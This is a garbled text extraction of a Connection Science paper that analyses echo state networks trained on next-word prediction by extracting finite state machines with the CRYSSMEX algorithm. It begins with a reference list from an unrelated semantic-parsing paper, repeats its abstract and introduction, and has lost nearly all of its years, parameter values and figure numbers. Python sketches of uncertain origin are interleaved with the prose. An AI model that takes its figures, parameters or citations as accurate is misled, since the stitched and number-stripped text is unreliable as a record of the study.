bugmann, g., klein, e., lauria, s., & kyriacou, t. ( ). corpus-based robotics: a route instruc- tion example. in proceedings of intelligent au- tonomous systems. carpenter, b. ( ). type-logical semantics. the mit press. chen, d. l. ( ). fast online lexicon learning for grounded language acquisition. in proceedings of the annual meeting of the association for com- putational linguistics. chen, d., kim, j., & mooney, r. ( ). training a mul- tilingual sportscaster: using perceptual context to learn language. journal of artificial intelligence research, ( ), – . chen, d., & mooney, r. ( ). learning to interpret natural language navigation instructions from observations. in proceedings of the national con- ference on artificial intelligence. clark, s., & curran, j. ( ). wide-coverage efficient statistical parsing with ccg and log-linear mod- els. computational linguistics, ( ), – . clarke, j., goldwasser, d., chang, m., & roth, d. ( ). driving semantic parsing from the world’s response. in proceedings of the confer- ence on computational natural language learn- ing. collins, m. ( ). parameter estimation for statis- tical parsing models: theory and practice of distribution-free methods. in new developments in parsing technology. davidson, d. ( ). the logical form of action sen- tences. essays on actions and events, – . di eugenio, b., & white, m. ( ). on the interpre- tation of natural language instructions. in pro- ceedings of the conference of the association of computational linguistics. dzifcak, j., scheutz, m., baral, c., & schermerhorn, p. ( ). what to do and how to do it: trans- lating natural language directives into temporal and dynamic logic representation for goal man- agement and action execution. in proceedings of the ieee international conference on robotics and automation. goldwasser, d., reichart, r., clarke, j., & roth, d. ( ). confidence driven unsupervised seman- tic parsing. in proceedings of the association of computational linguistics. goldwasser, d., & roth, d. ( ). learning from nat- ural instructions. in proceedings of the interna- tional joint conference on artificial intelligence. heim, i., & kratzer, a. ( ). semantics in generative grammar. blackwell oxford. kate, r., & mooney, r. ( ). using string-kernels for learning semantic parsers. in proceedings of the conference of the association for computational linguistics. kim, j., & mooney, r. j. ( ). unsupervised pcfg induction for grounded language learning with highly ambiguous supervision. in proceedings of the conference on empirical methods in natu- ral language processing. kollar, t., tellex, s., roy, d., & roy, n. ( ). toward understanding natural language directions. in proceedings of the acm/ieee international con- ference on human-robot interaction. krishnamurthy, j., & mitchell, t. ( ). weakly super- vised training of semantic parsers. in proceed- ings of the joint conference on empirical meth- ods in natural language processing and compu- tational natural language learning. kwiatkowski, t., goldwater, s., zettlemoyer, l., & steedman, m. ( ). a probabilistic model of syntactic and semantic acquisition from child- directed utterances and their meanings. proceed- ings of the conference of the european chapter of the association of computational linguistics. kwiatkowski, t., zettlemoyer, l., goldwater, s., & steedman, m. ( ). inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language process- ing. 
kwiatkowski, t., zettlemoyer, l., goldwater, s., & steedman, m. ( ). lexical generalization in ccg grammar induction for semantic parsing. in proceedings of the conference on empirical methods in natural language processing. lafferty, j., mccallum, a., & pereira, f. ( ). con- ditional random fields: probabilistic models for segmenting and labeling sequence data. in pro- ceedings of the international conference on ma- chine learning. lewis, d. ( ). general semantics. synthese, ( ), – . liang, p., jordan, m., & klein, d. ( ). learning se- mantic correspondences with less supervision. in proceedings of the joint conference of the asso- ciation for computational linguistics the interna- tional joint conference on natural language pro- cessing. liang, p., jordan, m., & klein, d. ( ). learning dependency-based compositional semantics. in proceedings of the conference of the association for computational linguistics. macmahon, m. ( ). following natural language route instructions. ph.d. thesis, university of texas at austin. macmahon, m., stankiewics, b., & kuipers, b. ( ). walk the talk: connecting language, knowl- edge, action in route instructions. in proceed- ings of the national conference on artificial intel- ligence. matuszek, c., fitzgerald, n., zettlemoyer, l., bo, l., & fox, d. ( ). a joint model of language and perception for grounded attribute learning. pro- ceedings of the international conference on ma- chine learning. matuszek, c., fox, d., & koscher, k. ( ). follow- ing directions using statistical machine translation. in proceedings of the international conference on human-robot interaction. matuszek, c., herbst, e., zettlemoyer, l. s., & fox, d. ( ). learning to parse natural language com- mands to a robot control system. in proceedings of the international symposium on experimental robotics. montague, r. ( ). the proper treatment of quantifi- cation in ordinary english. approaches to natural language, , – . muresan, s. ( ). learning for deep language under- standing. in proceedings of the international joint conference on artificial intelligence. parsons, t. ( ). events in the semantics of english. the mit press. singh-miller, n., & collins, m. ( ). trigger-based language modeling using a loss-sensitive percep- tron algorithm. in ieee international conference on acoustics, speech and signal processing. steedman, m. ( ). surface structure and interpreta- tion. the mit press. steedman, m. ( ). the syntactic process. the mit press. steedman, m. ( ). taking scope. the mit press. taskar, b., guestrin, c., & koller, d. ( ). max- margin markov networks. in proceedings of the conference on neural information processing systems. taskar, b., klein, d., collins, m., koller, d., & manning, c. ( ). max-margin parsing. in proceedings of the conference on empirical methods in natural language processing. tellex, s., kollar, t., dickerson, s., walter, m., banerjee, a., teller, s., & roy, n. ( ). understanding natural language commands for robotic naviga- tion and mobile manipulation. in proceedings of the national conference on artificial intelligence. vogel, a., & jurafsky, d. ( ). learning to follow nav- igational directions. in proceedings of the con- ference of the association for computational lin- guistics. webber, b., badler, n., di eugenio, b., geib, c., lev- ison, l., & moore, m. ( ). instructions, in- tentions and expectations. artificial intelligence, ( ), – . wei, y., brunskill, e., kollar, t., & roy, n. ( ). where to go: interpreting natural directions using global inference. 
in proceedings of the ieee international conference on robotics and automation. winograd, t. ( ). understanding natural language. cognitive psychology, ( ), – . wong, y., & mooney, r. ( ). learning synchronous grammars for semantic parsing with lambda calculus. in proceedings of the conference of the association for computational linguistics. zettlemoyer, l., & collins, m. ( ). learning to map sentences to logical form: structured classification with probabilistic categorial grammars. in proceedings of the conference on uncertainty in artificial intelligence. zettlemoyer, l., & collins, m. ( ). online learning of relaxed ccg grammars for parsing to logical form. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning.
connection science, ifirst. sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction. stefan l. frank (institute for logic, language and computation, university of amsterdam, amsterdam, the netherlands; corresponding author, s.l.frank@uva.nl) and henrik jacobsson (german research center for artificial intelligence (dfki), saarbrücken, germany; present address: google, zurich, switzerland). (received july ; final version received august ) it has been shown that the ability of echo state networks (esns) to generalise in a sentence-processing task can be increased by adjusting their input connection weights to the training data.
we present a qualitative analysis of the effect of such weight adjustment on an esn that is trained to perform the next-word prediction task. our analysis makes use of cryssmex, an algorithm for extracting finite state machines (fsms) from the data about the inputs, internal states, and outputs of recurrent neural networks that process symbol sequences. we find that the esn with adjusted input weights yields a concise and comprehensible fsm. in contrast, the standard esn, which shows poor generalisation, results in a massive and complex fsm. the extracted fsms show how the two networks differ behaviourally. moreover, poor generalisation is shown to correspond to a highly fragmented quantisation of the network's state space. such findings indicate that cryssmex can be a useful tool for analysing esn sentence processing. keywords: echo state networks; sentence processing; rule extraction; finite state machines . introduction echo state networks (esns; jaeger , ) have recently gained popularity as a recurrent neural network (rnn) model for time-series processing. the great advantage of esns over the more traditional recurrent networks, such as the simple recurrent network (srn; elman ), is that the weights of their input and recurrent connections remain fixed at their initial random values. only the output connection weights are trained, which can be done very efficiently by linear regression, without the need for any iterative gradient-descent method (such as the well-known backpropagation algorithm) for finding proper weights. although esns have been shown to be useful for several applications, attempts to use them for modelling sentence processing in the field of cognitive science have resulted in mixed outcomes. whereas one experiment (tong, bickett, christiansen, and cottrell ) showed esns to perform at least as well as srns in a next-word prediction task, others (čerňanský and tiňo, ; frank a) have found esns to generalise relatively poorly. one way of increasing an esn's ability to generalise is by adding a hidden layer in-between the recurrent and output layers (frank a, b). unfortunately, this also adds another set of connection weights to train, doing away with the network's efficient trainability. alternatively, esn generalisation can be improved by adjusting the input connection weights to the training input. as shown by čerňanský, makula, and beňušková ( ) and frank and čerňanský ( ), this can be done efficiently by one-shot, unsupervised learning. the resulting network can then be trained on the target output just like any esn, but with greatly increased ability to generalise. in this paper, we analyse the difference between two types of networks: the standard esn with random input weights and the alternative network with adjusted input weights (as mentioned above). following frank and čerňanský ( ), we call the latter model esn+. both networks are trained on the next-word prediction task in sentence processing. comparisons between the networks' performance on sentences that differ markedly from the training sentences, reported by frank and čerňanský, showed that esn+ generalises much better than does esn.
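For readers unfamiliar with the architecture, the ESN training recipe mentioned here, fixed random input and recurrent weights with a readout fitted by linear regression, can be sketched in a few lines of numpy. Reservoir size, spectral-radius scaling, and the ridge term below are illustrative choices, not the settings used in this study; in the ESN+ variant only the initialisation of the input weights would differ, while the readout training stays the same.

```python
import numpy as np

rng = np.random.default_rng(0)

# Fixed random reservoir and input weights (never trained).
n_in, n_res, n_out = 10, 100, 10
W_in = rng.uniform(-0.1, 0.1, (n_res, n_in))
W = rng.uniform(-1, 1, (n_res, n_res))
W *= 0.9 / max(abs(np.linalg.eigvals(W)))   # scale spectral radius below 1

def run_reservoir(inputs):
    """Collect reservoir states for a sequence of input vectors."""
    x = np.zeros(n_res)
    states = []
    for u in inputs:
        x = np.tanh(W_in @ u + W @ x)
        states.append(x.copy())
    return np.array(states)

# Train only the readout, by ridge regression on the collected states.
inputs = rng.standard_normal((200, n_in))    # stand-in input sequence
targets = rng.standard_normal((200, n_out))  # stand-in next-word targets
X = run_reservoir(inputs)
ridge = 1e-6
W_out = np.linalg.solve(X.T @ X + ridge * np.eye(n_res), X.T @ targets).T

pred = X @ W_out.T   # readout outputs for the training sequence
print(pred.shape)    # (200, 10)
```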
here, we extend this quantitative comparison with a qualitative analysis of the networks' behaviour and of the structure of their state spaces. this is done by applying the cryssmex algorithm (jacobsson a) for extracting finite state machines (fsms) from the data about the inputs, internal states, and outputs of recurrent neural net- works that process symbol sequences. we find that the esn with adjusted input weights yields a concise and comprehensible fsm. in contrast, the standard esn, which shows poor generalisation, results in a massive and complex fsm. the extracted fsms show how the two networks differ behaviourally. more- over, poor generalisation is shown to correspond to a highly fragmented quantisation of the network's state space. such findings indicate that cryssmex can be a useful tool for analysing esn sentence processing. keywords: echo state networks; sentence processing; rule extraction; finite state machines . introduction echo state networks (esns; jaeger , ) have recently gained popularity as a recurrent neural network (rnn) model for time-series processing. the great advantage of esns over the more traditional recurrent networks, such as the simple recurrent network (srn; elman ), is that the weights of their input and recurrent connections remain fixed at their initial random values. only the output connection weights are trained, which can be done very efficiently by linear regression, without the need for any iterative gradient-descent method (such as the well-known backpropagation algorithm) for finding proper weights. although esns have been shown to be useful for several applications, attempts to use them for modelling sentence processing in the field of cognitive science have resulted in mixed outcomes. whereas one experiment (tong, bickett, christiansen, and cottrell ) showed esns to perform
this form of ad hoc analysis is perhaps the most common, and may also be necessary to uncover the specifics of the solutions implemented through rnns; solutions that may very well be counterintuitive and interesting in many ways. however, one class of analysis methods, rule extraction, represents a broader and more generic approach to the problem of neural network analysis and has become a research field in its own right (andrews, diederich, and tickle ; jacobsson ). these techniques are typically developed to be portable and as widely applicable as possible (i.e., independent of network type and domain). the quality of a rule extractor is typically measured by (adapted from andrews et al. ): rule accuracy, in terms of how well the rules perform on the test set; rule fidelity, that is, how well the rules mimic the behaviour of the rnn; and rule comprehensibility, roughly corresponding the readability of the extracted rules and/or the size of the rule set. existing techniques for extracting rules (represented as fsm) from rnns were surveyed by jacobsson ( ). it turned out that, despite a great deal of diversity, all algorithms have four constituents in common: ( ) quantisation of the continuous state space of the rnn (e.g., by self-organising maps or k-means), resulting in a discrete set of states. ( ) generation of internal states and outputs by feeding input patterns to the rnn. ( ) construction of rules from the observed state transitions, usually resulting in deterministic automata. ( ) minimisation of the rule set, using some standard algorithm (see hopcroft and ullman ). as argued by jacobsson ( ), none of the existing techniques attempted to merge these four parts in any principled manner. for example, the surveyed techniques implemented the state-space quantisation through standard techniques, completely independent from machine minimisation, even though many clustering algorithms are based on merging of clusters that are equivalent (mirkin ), in a manner much like the merger of computationally equivalent states by the fsm minimisation algorithms. moreover, rule-extraction techniques could typically only be suc- cessfully applied to low-dimensional networks (up to three dimensions). in fact, basic plots of the state space were often more informative than the extracted machines themselves. . . cryssmex a basic problem when using standard clustering algorithms for quantising the state space of an rnn, or of any other dynamical system, is that the state space should not primarily be treated as euclidean space: since the state of an rnn governs its current and future behaviour, small distances in the state space may have a large impact on the functioning of the network, whereas large state-space distances may only affect the network minimally. the algorithm we use here, cryssmex (the crystallising substochastic sequential machine extractor) (jacobsson a), d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson does not suffer from this problem because it takes into account the dynamical rather than static geometric properties of the state space. . . . finite state machine extraction the cryssmex algorithm (outlined in algorithm ) is based on the combination of the above- mentioned four constituents. as an rnn operates on training or test data, cryssmex extracts a probabilistic fsm given the network’s input, internal states, and outputs. 
these data (denoted � in algorithm ) are sampled while the network processes sequences of inputs, as it does during training or testing. starting with a single-state fsm, cryssmex iteratively adjusts the fsm by splitting and merging states (i.e., changing the quantisation of the rnn’s state space), until the fsm is fully deterministic. cryssmex(�) input: time-series data, �, containing a sequence of input symbols, output symbols, and state vectors generated by the rnn when processing test data output: a deterministic machine m mimicking the rnn (if successful) begin let m be the stochastic machine based on � resulting from an unquantized state space (i.e. only one state); repeat select state vectors from � corresponding to indeterministic states in m; update the state quantiser by splitting the rnn state space according to selected data; create m using new state quantiser; if m has equivalent states then merge equivalent states; end until m is deterministic (success) or the number of iterations exceeds a predefined limit ; return m; end algorithm a simplified description of the main loop of cryssmex. m is created from the sequence of observed rnn inputs, outputs, and states contained in � by quantisation of the state space. this quantisation is iteratively refined, resulting in a sequence of increasingly accurate fsms being extracted. in each iteration, the current fsm’s ‘weakest’ points, which are its most non-deterministic states, are targeted for improvement by actively selecting the corresponding rnn states as the data to be used for refining the quantisation. the algorithm also keeps the extracted model minimal by merging regions in the state space that correspond to states that are computationally equivalent in the fsm. it was shown (jacobsson a; jacobsson, frank, and federici ) that cryssmex can efficiently extract probabilistic (or, in favourable circumstances, deterministic) fsms from rnns trained on deeply embedded grammars (anbn), high-dimensional rnns ( internal nodes), esns, and chaotic systems. moreover, the algorithm was successfully adapted to extract either moore- or mealy-type machines (jacobsson et al. ). in a mealy machine, the output of the network and the extracted machine is defined over transitions between states. in a moore machine, on the other hand, the output is defined as a function of the current state and input (hopcroft and ullman ). depending on the domain and network, either moore or mealy models will be d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science more compact and/or comprehensible. for the current application, we chose to extract moore machines, since these correspond more closely to the esns, whose output is indeed a function of the current state and input. . . . state-space quantisation to merge and split the state space, cryssmex creates a number of simple vector quantis- ers, arranged hierarchically in a graph (figure in section . shows an example). each split corresponds to a node in the graph, describing how the state space is separated into increasingly smaller regions. the algorithm that creates this arrangement of quantisers was called the crystalline vector quantiser (cvq) in jacobsson ( a). roughly speaking, it generates the so-called cvq graph by creating enough simple vector quantisers to split the state space properly. consequently, the number of required quantisers is inversely proportional to the quality of their operation for the data set under investigation. 
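to make the ingredients of the main loop concrete, the following much-simplified stand-in (not cryssmex itself) quantises recorded reservoir states with k-means, tabulates (state, input) transitions into a stochastic moore-style machine, and reports whether that machine is already deterministic. scikit-learn's kmeans serves as a placeholder quantiser, and there is no targeted splitting of indeterministic states or merging of equivalent ones.

```python
from collections import Counter, defaultdict
import numpy as np
from sklearn.cluster import KMeans  # placeholder quantiser, not the cvq used by cryssmex

def extract_stochastic_fsm(inputs, states, outputs, n_states=6, seed=0):
    """inputs, outputs: sequences of symbols observed at each time step;
    states: array of shape (T, dim) holding the recurrent-layer state at each step."""
    labels = KMeans(n_clusters=n_states, n_init=10,
                    random_state=seed).fit_predict(np.asarray(states))

    # moore-style output: the symbol most often emitted from each quantised state
    state_output = {q: Counter(o for q_t, o in zip(labels, outputs)
                               if q_t == q).most_common(1)[0][0]
                    for q in set(labels)}

    # transition statistics: (current state, next input symbol) -> next quantised state
    transitions = defaultdict(Counter)
    for t in range(len(labels) - 1):
        transitions[(labels[t], inputs[t + 1])][labels[t + 1]] += 1

    deterministic = all(len(dist) == 1 for dist in transitions.values())
    probs = {key: {s: c / sum(dist.values()) for s, c in dist.items()}
             for key, dist in transitions.items()}
    return state_output, probs, deterministic
```

in cryssmex proper, the indeterministic entries of such a machine would then be targeted for further splitting of the state space, and computationally equivalent states would be merged, exactly as in the loop outlined above.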
the vector quantiser in jacobsson ( a) was chosen to be simple and parameter-free, showing that the extracted machines were not impaired by an inappropriate choice of underlying quantisers. however, this quantiser is very sensitive to outliers or skewed distributions, typically making the resulting cvq graph size larger than would be implied by the number of iterations of cryssmex alone. . . . scaling properties prior to cryssmex, rule extraction from rnns had only been applied to networks with just a handful of internal units. whether rule extraction is feasible depends of course on the network’s size, but even more strongly so on its dynamics: a chaotic network with just one unit requires more fsm states than a very large but non-chaotic network (for a deeper discussion of this issue, see jacobsson a). cryssmex can easily handle much larger and more chaotic networks because it generates a sequence of stochastic fsms that form increasingly precise approximations of the network’s behaviour. if obtaining a full (i.e., deterministic) fsm description of the network is not feasible, the algorithm can be stopped after any iteration, yielding an fsm that may at least be sufficiently complete. moreover, since cryssmex currently (and quite deliberately) uses very simple vector quantisation for analysing the networks’ state space, it is reasonable to assume that the algorithm’s scaling properties could be further improved by using optimised algorithms (e.g., support vector machines). however, an investigation of this issue is beyond the scope of the current paper. it is less clear how well cryssmex scales up when the number of input and output symbols increases. the problem is essentially one of data scarcity: in every state there will be many possible input symbols for which a prediction needs to be modelled. how to deal with this is an open issue, but as argued elsewhere (jacobsson b), one could try an active learning approach in which the extraction algorithm interacts with the network directly to gather more data when needed. . method this section presents the methodological details of our simulations. first, in section . , we present the language processed by the networks, as well as the specific division into two distinct sets of sentences: those used for training and those used for testing. as explained in section . , two esns were trained to predict the upcoming word at each point in a sentence. that section also d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson explains how prediction performance is assessed, and how the networks’ outputs are discretised for cryssmex analysis. . . the language . . . lexicon the semi-natural language used by frank and čerňanský ( ) has a lexicon of words, containing plural nouns (e.g., girls, boys), transitive verbs (e.g., chase, see), two prepositions (from and with), one relative clause marker (that), and an end-of-sentence marker denoted [end], which is also considered a word. the nouns are divided into three groups: female nouns (e.g., women), male nouns (e.g., men), and animal nouns (e.g., bats). as explained below, this distinction is only relevant for distinguishing between training and test sentences. since the language has only syntax and no semantics, the names of words within each syntactic category are irrelevant and only provided to make the sentences more readable. . . . grammar sentences are generated by the grammar in table . 
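since all sentences are drawn from this grammar, a small generator makes the sentence space easy to explore. the sketch below implements the productions of the table that follows; the np branching probabilities are placeholders (the actual values appear in the table's parentheses in the original typesetting), and nouns are drawn freely from all three groups, without the role restrictions that define the training set.

```python
import random

NOUNS = {
    "fem":  ["women", "girls", "sisters"],
    "male": ["men", "boys", "brothers"],
    "anim": ["bats", "giraffes", "elephants", "dogs", "cats", "mice"],
}
VERBS = ["chase", "see", "swing", "love", "avoid", "follow", "hate", "hit", "eat", "like"]
# bare N | N SRC | N ORC | N PP: assumed placeholder probabilities
NP_BRANCH_P = [0.7, 0.1, 0.1, 0.1]

def noun(role):
    """draw a noun; 'role' is kept so a training-style role restriction could be imposed."""
    group = random.choice(list(NOUNS))
    return random.choice(NOUNS[group])

def np_(role):
    branch = random.choices(["n", "src", "orc", "pp"], weights=NP_BRANCH_P)[0]
    head = [noun(role)]
    if branch == "src":                      # src -> that v np_obj
        return head + ["that", random.choice(VERBS)] + np_("obj")
    if branch == "orc":                      # orc -> that n_subj v
        return head + ["that", noun("subj"), random.choice(VERBS)]
    if branch == "pp":                       # pp -> from/with np
        return head + [random.choice(["from", "with"])] + np_(role)
    return head

def sentence():                              # s -> np_subj v np_obj [end]
    return np_("subj") + [random.choice(VERBS)] + np_("obj") + ["[end]"]

if __name__ == "__main__":
    for _ in range(5):
        print(" ".join(sentence()))
```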
table . probabilistic context-free grammar of the language. variable r denotes a noun's grammatical role (subject or object). the probabilities of the different productions are equal, except for np, where they are given in parentheses.

  s     → npsubj v npobj [end]
  npr   → nr ( . ) | nr src ( . ) | nr orc ( . ) | nr ppr ( . )
  src   → that v npobj
  orc   → that nsubj v
  ppr   → from npr | with npr
  nr    → nfem | nmale | nanim
  nfem  → women | girls | sisters
  nmale → men | boys | brothers
  nanim → bats | giraffes | elephants | dogs | cats | mice
  v     → chase | see | swing | love | avoid | follow | hate | hit | eat | like

the simplest sentences, such as mice love cats [end], are just four words long, but longer sentences can be constructed by adding one or more prepositional phrases or relative clauses. relative clauses come in two types: subject-relative clauses (srcs, as in mice that love cats…) and object-relative clauses (orcs, as in mice that cats love…). since srcs can themselves contain a relative clause (as in mice that love cats that dogs avoid [end]), there is no upper bound to sentence length.

training and test sentences. we adopted not only the language used by frank and čerňanský ( ), but also their division of sentences into subsets used for training and testing. the common approach is to set aside a random sample of possible inputs and train only on the remaining sentences. however, frank and čerňanský's specific goal was to investigate whether esns can generalise to sentences that contain words occurring at positions they did not occupy during training. therefore, specific groups of sentences were withheld during training, such that some nouns only occurred in particular grammatical roles: male nouns were banned from the subject position and female nouns did not occur in the object position (the table shows which positions are considered to hold subject nouns and which hold object nouns). the resulting training set consisted of sentences, with an average length of . words.

frank and čerňanský ( ) tested networks on eight different types of sentences, but we will restrict our qualitative analysis to just one of these. the test set consisted of all sentences with structure 'nmale v nfem that nmale v [end]'. that is, all test sentences had one orc, which modified the second noun. note that animal nouns do not occur in test sentences, and that the roles of male and female nouns are reversed compared with training sentences: male nouns are in the subject position whereas female nouns are objects. this means that all test sentences differ quite strongly from the training sentences. the first word of a test sentence is always a male noun, which never occurred in the sentence-initial position during training. this makes generalisation to test sentences much more challenging than would have been the case if training sentences had been selected by an unrestricted random sample.

the echo state networks

architecture. we investigated the behaviour of two esns with identical architectures. as shown in figure , words are represented locally on the input layer, which feeds activation to a recurrent layer, called the 'dynamical reservoir' (dr) as is common in the esn literature. the dr also receives its own activation from the previous time step and feeds activation to the output layer. the output layer, like the input layer, has one unit for each word.
figure . architecture of esn(+). weights of connections between dr units (w_dr; solid arrow) are random and fixed; weights of connections from dr to output units (w_out; dotted arrow) are adapted to training data and task; weights of connections from input to dr units (w_in; dashed arrow) are random and fixed in esn, but adapted to training data in esn+.

input. if word i forms the input to the esn at time step t, the input activation vector a_in(t) has a_i(t) = 1 and a_j(t) = 0 for all j ≠ i. the weights of connections from input units to the dr are collected in the input weight matrix w_in. in most esns, these weights are chosen randomly, but here we use a different approach in which the input weights depend on the training data. in the esn+ model, most input weights are 0, but for dr-units j = , . . . , the weight of the connection from input unit i to dr-unit j equals

$$w_{j,i} = N \times \frac{n(i,j) + n(j,i)}{n(i)\,n(j)},$$

where N is the number of word tokens in the training data, n(i) is the number of times word i occurs in the training data, and n(i,j) is the number of times word j directly follows i. we adopted this particular approach from frank and čerňanský ( ), who used it because it was found by bullinaria and levy ( ) to yield word representations that could be successfully applied to several syntactic and semantic tasks. moreover, it is extremely simple, allowing for fast computation of the input weights.

choosing w_in in this manner results in the encoding of syntactic category information in the input weights. if we take column vector i of w_in (i.e., the weights of connections emanating from input unit i) to represent word i, it turns out that representations of words of the same category cluster together. as figure shows, there is a clear separation between nouns, verbs, prepositions, that, and [end]. in spite of the distinctive roles of female, male, and animal nouns in the training sentences, these three groups of nouns are more similar to one another than to other syntactic categories. this increases esn+ performance on test sentences because words within a syntactic category are equivalent according to the grammar of the table (see frank and čerňanský , for a comprehensive discussion).

esn+ is compared with a standard esn, that is, one with random input weights. however, a fair comparison between the two networks requires that the esn's input weights are at least distributed similarly to those of esn+. for this reason, the esn's non-zero input weights w_{j,i} are a random permutation of the corresponding weights of esn+; for all other j, the esn's input weights are 0, as in esn+. note that this does away with the syntactic information present in w_in, while making sure that the distribution of input weights is the same for esn and esn+.

dynamical reservoir. the two networks, esn and esn+, have identical drs. the dr has units, connected to each other with weights collected in the matrix w_dr. the dr is sparsely connected in that % of the values in w_dr are 0. all other values are taken randomly from a uniform distribution centred at 0, after which they are linearly rescaled such that the spectral radius of w_dr (i.e., its largest eigenvalue) equals . .

figure . hierarchical cluster analysis of word representation vectors (i.e., input weights). [the dendrogram separates the nouns (dogs, mice, bats, cats, elephants, giraffes, sisters, men, brothers, boys, women, girls), [end], the prepositions from and with, the verbs (chase, avoid, follow, eat, see, bump, love, like, swing, hit), and that.]

the dr's activation vector at time step t, denoted a_dr(t) ∈ [0, 1], is computed at each time step by

$$a_{\mathrm{dr}}(t) = f_{\mathrm{dr}}\!\left(W_{\mathrm{dr}}\, a_{\mathrm{dr}}(t-1) + W_{\mathrm{in}}\, a_{\mathrm{in}}(t)\right), \tag{1}$$

where a_dr(t−1) is the dr state in the previous time step (with a_dr(0) set to a fixed initial value at the beginning of each sentence) and f_dr is the logistic function.

output. the weights of connections from dr units to the outputs are collected in the matrix w_out. each output unit i also receives a bias activation b_i. the output at time step t equals

$$a_{\mathrm{out}}(t) = f_{\mathrm{out}}\!\left(W_{\mathrm{out}}\, a_{\mathrm{dr}}(t) + b\right), \tag{2}$$

where b is the vector of bias activations and f_out is the softmax function

$$f_{i,\mathrm{out}}(x) = \frac{e^{x_i}}{\sum_j e^{x_j}}, \tag{3}$$

due to which the outputs are positive and sum to 1, making a_out a probability distribution. that is, the output value a_{out,i}(t) is the network's estimate of the probability that word i will be the input at time step t+1.

network training. as explained by jaeger ( ), useful output connection weights and biases, w_out and b, are easy to find without any iterative training method. ideally, a target matrix U = (u(1), u(2), ..., u(N−1)) is constructed, where each column vector u(t) has a value of 1 at the single element corresponding to the input word at t+1, and all other elements are 0. that is, the vector u(t) forms the correct prediction of the input at t+1. next, the complete training sequence (excluding the last word) is run through the dr, according to equation (1). the resulting vectors a_dr(t) are collected in a matrix A. the connection weight matrix and bias vector are now computed by

$$W_{\mathrm{out}} = f_{\mathrm{out}}^{-1}(U)\,A^{+}, \qquad b = f_{\mathrm{out}}^{-1}(U)\,\mathbf{1}, \tag{4}$$

where A⁺ is the pseudoinverse of A, and 1 is an (N−1)-element column vector consisting of 1s.

an obvious problem with this method is that the softmax function (equation (3)) does not have an inverse f_out^{−1}, and even if it did, the values 0 and 1 would be outside the inverse domain. in the past, this problem was avoided by either applying a less efficient training method that does not involve f_out^{−1} (frank a, b), or by taking f_out to be the identity function. in the latter case, the resulting a_out does not form a probability distribution, so an additional transformation is needed to remove negative values and make sure the activations sum to 1 (čerňanský and tiňo , ; čerňanský et al. ; frank and čerňanský, ). here, we do take f_out to be the softmax function and train the network using equation (4). this is possible because, although f_out has no inverse in general, a proper f_out^{−1}(u) does exist for particular target vectors u. in our case, each u = (u_1, ..., u_n)^T has one element u_c arbitrarily close to 1, whereas all other elements have an arbitrarily small but positive value ε < n^{−1} (where n is the number of words in the language). as derived in the appendix, the inverse softmax in that case equals

$$f_{i,\mathrm{out}}^{-1}(u) = \begin{cases} \ln(\varepsilon^{-1} - n + 1) & \text{if } i = c, \\ 0 & \text{if } i \neq c. \end{cases}$$

in the simulations, ε is set to a fixed small value.

network analysis. prediction performance. since the grammar of the language is known, the true probability of occurrence of each word at each point in the sentence can be computed.
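before turning to how prediction performance is scored, the pieces described in this section can be pulled together in a compact numerical sketch, assuming numpy: bigram-count input weights as in the formula above, the reservoir update of equation (1), and the one-shot readout training of equation (4) with inverse-softmax targets. the reservoir size, sparsity, spectral radius, initial state, and ε are illustrative placeholders (the actual values are not reproduced here), and the bias is computed literally from the reconstructed equation (4).

```python
import numpy as np

rng = np.random.default_rng(0)

def input_weights(sentences, vocab, n_reservoir):
    """esn+-style input weights from bigram counts (the w_{j,i} formula above).
    assumes every vocabulary word occurs at least once in the sentences."""
    idx = {w: k for k, w in enumerate(vocab)}
    n_tokens = sum(len(s) for s in sentences)
    uni = np.zeros(len(vocab))
    big = np.zeros((len(vocab), len(vocab)))
    for s in sentences:
        for a, b in zip(s, s[1:]):
            big[idx[a], idx[b]] += 1
        for w in s:
            uni[idx[w]] += 1
    assoc = n_tokens * (big + big.T) / np.outer(uni, uni)   # symmetric word association
    w_in = np.zeros((n_reservoir, len(vocab)))
    w_in[:len(vocab), :] = assoc          # only the first len(vocab) dr-units receive input
    return w_in

def make_reservoir(n, density=0.15, radius=0.9):
    """sparse random reservoir rescaled to a chosen spectral radius (illustrative values)."""
    w = rng.uniform(-1.0, 1.0, (n, n)) * (rng.random((n, n)) < density)
    return w * (radius / max(abs(np.linalg.eigvals(w))))

def run_reservoir(w_dr, w_in, onehot_sequence, a0=0.5):
    """equation (1) with a logistic nonlinearity; a0 is an assumed initial state value."""
    states, a = [], np.full(w_dr.shape[0], a0)
    for x in onehot_sequence:
        a = 1.0 / (1.0 + np.exp(-(w_dr @ a + w_in @ x)))
        states.append(a)
    return np.array(states).T                      # shape (n_reservoir, T)

def train_readout(states, targets_onehot, eps=1e-3):
    """equation (4): inverse-softmax targets, readout via the pseudoinverse.
    eps must be smaller than 1 / number-of-words; 1e-3 is a placeholder."""
    n_words = targets_onehot.shape[0]
    u_inv = np.where(targets_onehot > 0.5, np.log(1.0 / eps - n_words + 1), 0.0)
    w_out = u_inv @ np.linalg.pinv(states)
    b = u_inv @ np.ones(states.shape[1])
    return w_out, b

def predict(w_out, b, state):
    """equations (2)-(3): softmax readout giving a next-word probability distribution."""
    z = w_out @ state + b
    e = np.exp(z - z.max())
    return e / e.sum()
```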
the prediction performance of the networks is rated by comparing their output vectors, which can be interpreted as probability distributions over words, to the true distributions according to the grammar of the table. more precisely, we take the kullback–leibler divergence from the output distribution to the true distribution as a measure for the network's prediction error.

